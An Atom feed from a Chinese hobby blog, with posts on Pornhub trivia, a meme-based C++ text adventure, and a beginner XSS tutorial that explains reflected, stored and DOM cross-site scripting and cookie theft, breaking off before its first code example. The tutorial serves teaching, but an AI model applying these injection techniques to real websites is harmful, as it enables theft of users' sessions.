<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>白客空间</title>
  
  <subtitle>......</subtitle>
  <link href="http://example.com/atom.xml" rel="self"/>
  
  <link href="http://example.com/"/>
  <updated>2022-02-10T08:23:28.662Z</updated>
  <id>http://example.com/</id>
  
  <author>
    <name>whitegeeker</name>
    
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>我在P站学习新《姿势》</title>
    <link href="http://example.com/2022/02/10/%E6%88%91%E5%9C%A8P%E7%AB%99%E5%AD%A6%E4%B9%A0%E6%96%B0%E3%80%8A%E5%A7%BF%E5%8A%BF%E3%80%8B/"/>
    <id>http://example.com/2022/02/10/%E6%88%91%E5%9C%A8P%E7%AB%99%E5%AD%A6%E4%B9%A0%E6%96%B0%E3%80%8A%E5%A7%BF%E5%8A%BF%E3%80%8B/</id>
    <published>2022-02-10T07:38:59.000Z</published>
    <updated>2022-02-10T08:23:28.662Z</updated>
    
    <content type="html"><![CDATA[<h1 id="0-1-背景"><a href="#0-1-背景" class="headerlink" title="0.1 背景"></a>0.1 背景</h1><p>众所周知，P站是世界第一的成人网站，但是在2020年12月，Pornhub下架了超过1000万部未经认证的视频。Pornhub的这一举动与普利策奖得主纪思道2020年12月4日在《纽约时报》发布的专栏文章《被Pornhub毁掉的孩子》有关。该文指出，Pornhub每月能吸引35亿次访问，每日广告曝光量高达30亿美元，网站上充斥着**暴力等违规视频</p><p>这里有一张抗议群众的图片：</p><p><a href="https://imgtu.com/i/Ht8bKx"><img src="https://s4.ax1x.com/2022/02/10/Ht8bKx.jpg" alt="Ht8bKx.jpg"></a></p><h1 id="1-0-简介"><a href="#1-0-简介" class="headerlink" title="1.0 简介"></a>1.0 简介</h1><p>这里是讲给不了解P站人听的，<del>驾龄像我一样高就不用再看简介了啊</del></p><blockquote><p><strong>Pornhub</strong>是全球最大的<a href="https://baike.baidu.com/item/%E8%89%B2%E6%83%85/794645">色情</a>影片分享网站之一。于2007年成立于<a href="https://baike.baidu.com/item/%E5%8A%A0%E6%8B%BF%E5%A4%A7/145973">加拿大</a><a href="https://baike.baidu.com/item/%E8%92%99%E7%89%B9%E5%88%A9%E5%B0%94/80820">蒙特利尔</a>，是属于大型的色情视频分享类网站，被视为是“色情2.0”的先驱，在<a href="https://baike.baidu.com/item/Alexa/75129">Alexa</a>上排名第80位（最高时曾跻身前30）。</p></blockquote><p><strong>注：欧美相对开放些，法律是允许的</strong></p><blockquote><p>它是一个免费的，由广告支持的网站。除了专业色情内容，网站也提供业余色情内容。Pornhub的形式类似于<a href="https://baike.baidu.com/item/Youtube/6497100">Youtube</a>，用户可以免费观看该网站上的视频，也可以将自己手中色情视频资源分享到该网站上。此外，也有许多第三方视频内容制作商会上传部分自己制作的“专业”视频内容到这家网站上。</p></blockquote><p><strong>位置</strong></p><blockquote><p> Pornhub在英国<a href="https://baike.baidu.com/item/%E4%BC%A6%E6%95%A6%E5%B8%82/2024168">伦敦市</a>，美国<a href="https://baike.baidu.com/item/%E5%8A%A0%E5%88%A9%E7%A6%8F%E5%B0%BC%E4%BA%9A">加利福尼亚</a>州<a href="https://baike.baidu.com/item/%E6%97%A7%E9%87%91%E5%B1%B1">旧金山</a>市，美国<a href="https://baike.baidu.com/item/%E5%BE%97%E5%85%8B%E8%90%A8%E6%96%AF">得克萨斯</a>州<a href="https://baike.baidu.com/item/%E4%BC%91%E6%96%AF%E6%95%A6">休斯敦</a>市以及美国<a href="https://baike.baidu.com/item/%E8%B7%AF%E6%98%93%E6%96%AF%E5%AE%89%E9%82%A3%E5%B7%9E/2935061">路易斯安那州</a><a href="https://baike.baidu.com/item/%E6%96%B0%E5%A5%A5%E5%B0%94%E8%89%AF">新奥尔良</a>市均有<a href="https://baike.baidu.com/item/%E5%88%86%E5%B8%83%E5%BC%8F%E6%9C%8D%E5%8A%A1%E5%99%A8/9023086">分布式服务器</a>。 2010年3月Pornhub被MindGeek购买，MindGeek同时拥有许多其他的色情网站。</p></blockquote><h1 id="2-0-事件"><a href="#2-0-事件" class="headerlink" title="2.0 事件"></a>2.0 事件</h1><p><strong>1.拍摄太空AV</strong></p><blockquote><p>Pornhub2015年6月宣布将在<a href="https://baike.baidu.com/item/%E6%88%90%E4%BA%BA%E5%BD%B1%E7%89%87/12786831">成人影片</a>中加入新的元素，计划将A片演员辛斯（Johnny Sins） 与洛维亚（Eva Lovia）送上太空，完成第一部太空色情片《性爱探索》（Sexploration）。此外，为了支付高达340万美元（约合人民币2400万元）的拍片开销，色情网站在募资平台indiegogo上建立页面募款，截至11日已募得近8000美元。PornHub 副总柯瑞（ Corey Price ）表示，“如果募款顺利，这将改写历史”。然而许多专家提出质疑，认为要成功在无重力状态下性爱，需要克服许多障碍。另外<a href="https://baike.baidu.com/item/%E7%BE%8E%E5%9B%BD%E5%9B%BD%E5%AE%B6%E8%88%AA%E7%A9%BA%E8%88%AA%E5%A4%A9%E5%B1%80/1538915">美国国家航空航天局</a>（NASA）专家沃尔普（Wolpe）就表示，男性在失重状态下不易起生理反应，雄性激素在离开大气层后也会开始下降。</p></blockquote><p><a href="https://imgtu.com/i/HtGoTS"><img src="https://s4.ax1x.com/2022/02/10/HtGoTS.jpg" alt="HtGoTS.jpg"></a></p><p><strong>注：由于这部影片是拍卖付费的，所以不方便截图<del>其实也不能截图，这里只是科普以下，百度百科上有原图片和文字</del></strong></p><h1 id="3-0-现在的P站"><a href="#3-0-现在的P站" class="headerlink" title="3.0 现在的P站"></a>3.0 现在的P站</h1><p>我们知道P站在当时只能断臂求生，它凭借着<strong>一年访问量29亿</strong>准备推行新的项目：</p><p><strong>1.VR影片</strong></p><p><a href="https://imgtu.com/i/HtYnuq"><img src="https://s4.ax1x.com/2022/02/10/HtYnuq.png" alt="HtYnuq.png"></a></p><p><del>不多说自己体会</del></p><p><strong>2.P站惊人的数据</strong></p><p><a href="https://imgtu.com/i/HtthO1"><img src="https://s4.ax1x.com/2022/02/10/HtthO1.png" alt="HtthO1.png"></a></p><blockquote><p>—全年访客 <strong>290 亿</strong>；</p></blockquote><blockquote><p>—日均活跃用户 <strong>9000 万</strong>；</p></blockquote><blockquote><p>—全年用户上传视频总量为 <strong>415万</strong>；</p></blockquote><blockquote><p>—全年上传视频共计 <strong>3732 PB</strong>；</p></blockquote><blockquote><p>—全年视频总量足以<strong>装满世界上所有苹果手机</strong>；</p></blockquote><blockquote><p>—全年视频获赞 <strong>120 亿次</strong>；</p></blockquote><blockquote><p>—年度上传的视频可以播放 <strong>68 年</strong>。</p></blockquote><p><del>我记得我们班还有人说他把整个网站上的视频都看完了，看来肾也很长寿，也不知道他多大了</del></p><p><strong>3.实体店</strong></p><p><del>没错你没听错</del></p><p><a href="https://imgtu.com/i/HtNxgJ"><img src="https://s4.ax1x.com/2022/02/10/HtNxgJ.png" alt="HtNxgJ.png"></a></p><p><strong>4.其它</strong></p><p>世界疫情至今，<strong>Pornhub 的全球流量远远高于平时</strong>，最高的一天浏览量竟增长了<strong>24.4%<strong>，而这</strong>仅仅是刚刚开始…</strong></p><p><a href="https://imgtu.com/i/HttmJe"><img src="https://s4.ax1x.com/2022/02/10/HttmJe.png" alt="HttmJe.png"></a></p><h1 id="4-0-你认为P站只会ghs？"><a href="#4-0-你认为P站只会ghs？" class="headerlink" title="4.0 你认为P站只会ghs？"></a>4.0 你认为P站只会ghs？</h1><p><strong>answer：绝对不是，P站强到超乎你想象</strong></p><p><strong>题外话</strong></p><p>这是不是像极了疫情期间上网课的你？（坏笑</p><p><a href="https://imgtu.com/i/HtUabq"><img src="https://s4.ax1x.com/2022/02/10/HtUabq.png" alt="HtUabq.png"></a></p><p><strong>特色1：放松却不忘学习</strong></p><p><a href="https://imgtu.com/i/HtuYwj"><img src="https://s4.ax1x.com/2022/02/10/HtuYwj.jpg" alt="HtuYwj.jpg"></a></p><p><del>徐涛是什么鬼</del></p><p><a href="https://imgtu.com/i/Hta0OA"><img src="https://s4.ax1x.com/2022/02/10/Hta0OA.png" alt="Hta0OA.png"></a></p><p>在看P站刺激视频放松的同时，还可以观看数学、政治等知识<del>姿势</del>来充实人生，一举两得有没有。</p><p>著名天秀学家徐某生说过：</p><blockquote><p>上次我监考孩子们考研，可以这样说噢，考研的人在家都在看资料复习啊，他们都是人上人，就是你们说的”所谓的学霸“，真正的学霸都是在家干出来的，不是这样吗？</p></blockquote><p><strong>特色2：在家学广播体操</strong></p><p><a href="https://imgtu.com/i/HtdA6H"><img src="https://s4.ax1x.com/2022/02/10/HtdA6H.png" alt="HtdA6H.png"></a></p><p><del>还有很多广播体操噢</del></p><p><strong>特色3：公益</strong></p><p>其实不得不说现在的 P站是越来越有趣了</p><p><a href="https://imgtu.com/i/HtdW4K"><img src="https://s4.ax1x.com/2022/02/10/HtdW4K.png" alt="HtdW4K.png"></a></p><p><del>这张图其实也反映了播放量的恐怖</del></p><p>2019年<strong>在世界最“污”的海域</strong>上，拍摄了一部<strong>“公益视频”</strong>，该视频<strong>每播放一次</strong>，将会<strong>捐出一笔专门治理海洋污染的款项</strong>。如gif动画所示：</p><p><a href="https://imgtu.com/i/Htw156"><img src="https://s4.ax1x.com/2022/02/10/Htw156.gif" alt="Htw156.gif"></a></p><p><a href="https://imgtu.com/i/Ht0Lp8"><img src="https://s4.ax1x.com/2022/02/10/Ht0Lp8.png" alt="Ht0Lp8.png"></a></p><p><strong>特色4：商业</strong></p><p><del>买衣服背包啦，怎么看着就刺激(?</del></p><p><a href="https://imgtu.com/i/HtBPhV"><img src="https://s4.ax1x.com/2022/02/10/HtBPhV.png" alt="HtBPhV.png"></a></p><p><a href="https://imgtu.com/i/HtBDgS"><img src="https://s4.ax1x.com/2022/02/10/HtBDgS.png" alt="HtBDgS.png"></a></p><p><del>身材还蛮结实的嘛，什么啊，比结实还刺激</del></p><p><strong>特色5：终生VIP</strong></p><p><a href="https://imgtu.com/i/HtBIvF"><img src="https://s4.ax1x.com/2022/02/10/HtBIvF.png" alt="HtBIvF.png"></a></p><h1 id="5-0-总结"><a href="#5-0-总结" class="headerlink" title="5.0 总结"></a>5.0 总结</h1><p><del>不得不说，时代变了，P站更适合观赏了</del></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;0-1-背景&quot;&gt;&lt;a href=&quot;#0-1-背景&quot; class=&quot;headerlink&quot; title=&quot;0.1 背景&quot;&gt;&lt;/a&gt;0.1 背景&lt;/h1&gt;&lt;p&gt;众所周知，P站是世界第一的成人网站，但是在2020年12月，Pornhub下架了超过1000万部未经认证的视</summary>
      
    
    
    
    <category term="知识" scheme="http://example.com/categories/%E7%9F%A5%E8%AF%86/"/>
    
    
    <category term="pornhub" scheme="http://example.com/tags/pornhub/"/>
    
  </entry>
  
  <entry>
    <title>日常搜索搜到徐哥</title>
    <link href="http://example.com/2022/02/02/%E6%97%A5%E5%B8%B8%E6%90%9C%E7%B4%A2%E6%90%9C%E5%88%B0%E5%BE%90%E5%93%A5/"/>
    <id>http://example.com/2022/02/02/%E6%97%A5%E5%B8%B8%E6%90%9C%E7%B4%A2%E6%90%9C%E5%88%B0%E5%BE%90%E5%93%A5/</id>
    <published>2022-02-02T09:50:53.000Z</published>
    <updated>2022-02-05T12:51:59.075Z</updated>
    
    <content type="html"><![CDATA[<h1 id="不说了，懂的都懂"><a href="#不说了，懂的都懂" class="headerlink" title="不说了，懂的都懂"></a>不说了，懂的都懂</h1><p><img src="https://s4.ax1x.com/2022/02/02/HAyVk6.png" alt="HAyVk6.png"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;不说了，懂的都懂&quot;&gt;&lt;a href=&quot;#不说了，懂的都懂&quot; class=&quot;headerlink&quot; title=&quot;不说了，懂的都懂&quot;&gt;&lt;/a&gt;不说了，懂的都懂&lt;/h1&gt;&lt;p&gt;&lt;img src=&quot;https://s4.ax1x.com/2022/02/02/HAyVk</summary>
      
    
    
    
    <category term="动态" scheme="http://example.com/categories/%E5%8A%A8%E6%80%81/"/>
    
    
    <category term="其它" scheme="http://example.com/tags/%E5%85%B6%E5%AE%83/"/>
    
  </entry>
  
  <entry>
    <title>难逃一杰c++游戏源码</title>
    <link href="http://example.com/2022/01/29/%E9%9A%BE%E9%80%83%E4%B8%80%E6%9D%B0c-%E6%B8%B8%E6%88%8F%E6%BA%90%E7%A0%81/"/>
    <id>http://example.com/2022/01/29/%E9%9A%BE%E9%80%83%E4%B8%80%E6%9D%B0c-%E6%B8%B8%E6%88%8F%E6%BA%90%E7%A0%81/</id>
    <published>2022-01-29T06:06:06.000Z</published>
    <updated>2022-01-30T06:29:24.290Z</updated>
    
    <content type="html"><![CDATA[<h1 id="1-0-源码-更新中"><a href="#1-0-源码-更新中" class="headerlink" title="1.0 源码(更新中)"></a>1.0 源码(更新中)</h1><p>（Beta1.1）  </p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;bits/stdc++.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;conio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> say(x) cout&lt;&lt; x </span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">log</span><span class="params">(string s)</span></span>&#123;</span><br><span class="line"><span class="keyword">int</span> l=s.<span class="built_in">size</span>();</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i&lt;l;i++)&#123;</span><br><span class="line"><span class="built_in">say</span>(s[i]);</span><br><span class="line"><span class="built_in">Sleep</span>(<span class="number">55</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line"><span class="keyword">int</span> ans;</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：弱哎，拜托你很弱哎！&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿妈：阿伟又在打电动啊，休息一下吧，看个书好不好？&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**1.“不要，烦耶”&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**2.“好啊，没问题啊”&quot;</span>); </span><br><span class="line">cin&gt;&gt;ans;</span><br><span class="line"><span class="built_in"><span class="keyword">switch</span></span>(ans)&#123;</span><br><span class="line"><span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿妈：我才说你一句你就说我烦，我只希望你用功学习，整天就看到你在这里打-电-动！&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：哎呦死了啦，都是你害的啦！拜托（摔电脑）。我去学习了啊&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**1.去书店&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**2.去网吧打电动&quot;</span>);</span><br><span class="line">cin&gt;&gt;ans;</span><br><span class="line"><span class="built_in"><span class="keyword">switch</span></span>(ans)&#123;</span><br><span class="line"><span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿徐：阿伟，又在看书，看个完型填空A片吧，题目还蛮结实的&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：徐哥不要啦&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;如果早知道阿伟也会看完型...&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;GAMEOVER...&quot;</span>);</span><br><span class="line"><span class="keyword">break</span>; </span><br><span class="line"><span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：他超废的&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：我知道啊，之前我就干掉他过&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：他每次都被我洗战绩耶&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：他就嫩啊&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**杰哥回眸一笑**&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：快点啦，我看到了，左边左边&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：好了&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：上面上面……左边左边&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：你不会放诶,我输了啊，快点放…我输了，不要玩了&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**1.“诶，你不要每次都这样好不好”&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**2.你就逊呗！&quot;</span>) ;</span><br><span class="line">cin&gt;&gt;ans;</span><br><span class="line"><span class="built_in"><span class="keyword">switch</span></span>(ans)&#123;</span><br><span class="line"><span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：不想玩了啦&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：你还有没有钱啊，我肚子好饿&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：没了啦，今天都花光了&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**1.揍彬彬&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**2.“我刚刚不是叫你多带一点吗”&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：你干嘛自己不多带&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：你不要每次都这样好不好啦&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：好啦，时间也差不多了&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**杰哥默默在等他们**&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：彬彬，我好饿喔&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：我们两个都没钱了&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：你要干嘛&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：没有钱我们只能回家&quot;</span>);   </span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：拜托，我才不要回家咧，我阿妈超凶的耶，去住你家啦&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：不行啊&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：为什么不行&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：我自己都自身难保了，而且我爸会揍我&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**1.那你爸很弱哎&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**2.去找蓄谋已久的杰哥&quot;</span>);</span><br><span class="line">cin&gt;&gt;ans;</span><br><span class="line"><span class="built_in"><span class="keyword">switch</span></span>(ans)&#123;</span><br><span class="line"><span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：拜托，你也自身难保了哎&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;彬彬：让我康康你有没有钱&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：不要...&quot;</span>); </span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;如果早知道阿伟也会被打...&quot;</span>); </span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿杰：不好意思，我刚听到你们两个说肚子饿，我这里刚好有个面包，给你们吃（显示自己的力量，表示愿意帮助二人），我还不饿，来，请你们吃（表达善意）&quot;</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**彬彬站起来，一拳...&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;如果早知道阿伟也会被打...&quot;</span>);</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿妈：这个阿伟很勇啊，知识还蛮渊博的嘛&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：阿妈你干嘛啊&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;**阿妈带上老花镜**&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿妈：拜托，我也想来学习！&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：不要！&quot;</span>); </span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：拜托，你不要每次都这样好不好！？&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;阿伟：啊，我死了啦&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;......&quot;</span>);</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;如果早知道阿妈这么勇...&quot;</span>);</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">default</span>:</span><br><span class="line"><span class="built_in">log</span>(<span class="string">&quot;输入错误，游戏结束...&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;1-0-源码-更新中&quot;&gt;&lt;a href=&quot;#1-0-源码-更新中&quot; class=&quot;headerlink&quot; title=&quot;1.0 源码(更新中)&quot;&gt;&lt;/a&gt;1.0 源码(更新中)&lt;/h1&gt;&lt;p&gt;（Beta1.1）  &lt;/p&gt;
&lt;figure class=&quot;highl</summary>
      
    
    
    
    <category term="游戏" scheme="http://example.com/categories/%E6%B8%B8%E6%88%8F/"/>
    
    
    <category term="c++" scheme="http://example.com/tags/c/"/>
    
  </entry>
  
  <entry>
    <title>各种xss插入姿势</title>
    <link href="http://example.com/2022/01/22/%E5%90%84%E7%A7%8Dxss%E6%8F%92%E5%85%A5%E5%A7%BF%E5%8A%BF/"/>
    <id>http://example.com/2022/01/22/%E5%90%84%E7%A7%8Dxss%E6%8F%92%E5%85%A5%E5%A7%BF%E5%8A%BF/</id>
    <published>2022-01-22T09:22:57.000Z</published>
    <updated>2022-01-27T07:54:43.302Z</updated>
    
    <content type="html"><![CDATA[<h1 id="1-0-前言"><a href="#1-0-前言" class="headerlink" title="1.0 前言"></a>1.0 前言</h1><p><a href="https://imgtu.com/i/7fOl6J"><img src="https://s4.ax1x.com/2022/01/22/7fOl6J.png" alt="7fOl6J.png"></a></p><p>现在人的脑洞都挺大啊，<del>思维也都挺敏捷哈</del></p><p>事实上，xss的确是一种插入的形式来植入恶意代码，下面我来带大家由浅入深的讲解一下xss攻击（这是一种注入型攻击）</p><p>既然你们都喜欢这样，那么我就用思维敏捷点的方式来讲（手动滑稽</p><h1 id="2-0-什么是xss攻击"><a href="#2-0-什么是xss攻击" class="headerlink" title="2.0 什么是xss攻击"></a>2.0 什么是xss攻击</h1><p>xss是跨站脚本攻击（Cross Site Scriping）</p><hr><blockquote><p>Q：为什么cross不用C来表示呢？</p><p>A：因为已经有了css（层叠样式表）</p></blockquote><h2 id="2-1-原理"><a href="#2-1-原理" class="headerlink" title="2.1 原理"></a>2.1 原理</h2><p>跨站脚本攻击是攻击者通过有web漏洞的页面中插入恶意js脚本而进行破坏，</p><p>从而使其他用户在打开该页面时执行恶意代码，达到攻击者一定目的。</p><p style="color:blue">总结：xss攻击使对于用户层面的攻击</p><h1 id="3-0-xss的分类"><a href="#3-0-xss的分类" class="headerlink" title="3.0 xss的分类"></a>3.0 xss的分类</h1><p>分为：</p><p><button style="border-radius:25px;background-color:yellow">1.反射型</button>   </p><p><button style="border-radius:25px;background-color:yellow">2.储存型 </button>    </p><p><button style="border-radius:25px;background-color:yellow">3.DOM型</button></p><h2 id="3-1-反射型"><a href="#3-1-反射型" class="headerlink" title="3.1 反射型"></a>3.1 反射型</h2><p><a href="https://imgtu.com/i/7fvX38"><img src="https://s4.ax1x.com/2022/01/22/7fvX38.png" alt="7fvX38.png"></a></p><p><strong>解释：并非持久的插入方式，大多数是需要欺骗用户点击链接出发，因此不够深，服务器是没有这串代码的</strong></p><p style="color:green">用处：通常是获取用户cookie信息</p><p style="color:yellowgreen">姿势：如通过搜索框插入</p><p style="color:blue">总结：深度不够，也不持久，仅为一次插入</p><p><del>喂，别想歪了啊</del></p><h2 id="3-2-储存型"><a href="#3-2-储存型" class="headerlink" title="3.2 储存型"></a>3.2 储存型</h2><p>这种方式非常持久喔，一般只要网站过滤不严格，那么就可以将其存储进服务器内部，这次深度够了,插起来也很方便，来，上学习资料：</p><p><a href="https://imgtu.com/i/7fxXI1"><img src="https://s4.ax1x.com/2022/01/22/7fxXI1.png" alt="7fxXI1.png"></a></p><blockquote><p>存储型XSS，持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie</p></blockquote><p style="color:green">用处：本领大，主要是能储存，严重威胁web安全</p><p style="color:yellowgreen">姿势：如通过评论插入</p><p style="color:blue">总结：非常深，很持久</p><h2 id="3-3-DOM型"><a href="#3-3-DOM型" class="headerlink" title="3.3 DOM型"></a>3.3 DOM型</h2><p>这个方式其实挺特殊的啊，这里的DOM指的是前端标签语言HTML中的dom属性，有机会我会来讲解一下。这里我找到了好理解的一段话供大家参考：</p><blockquote><p>不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型XSS。</p></blockquote><p>那么可以激发DOM型xss”欲望“的语句有：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span 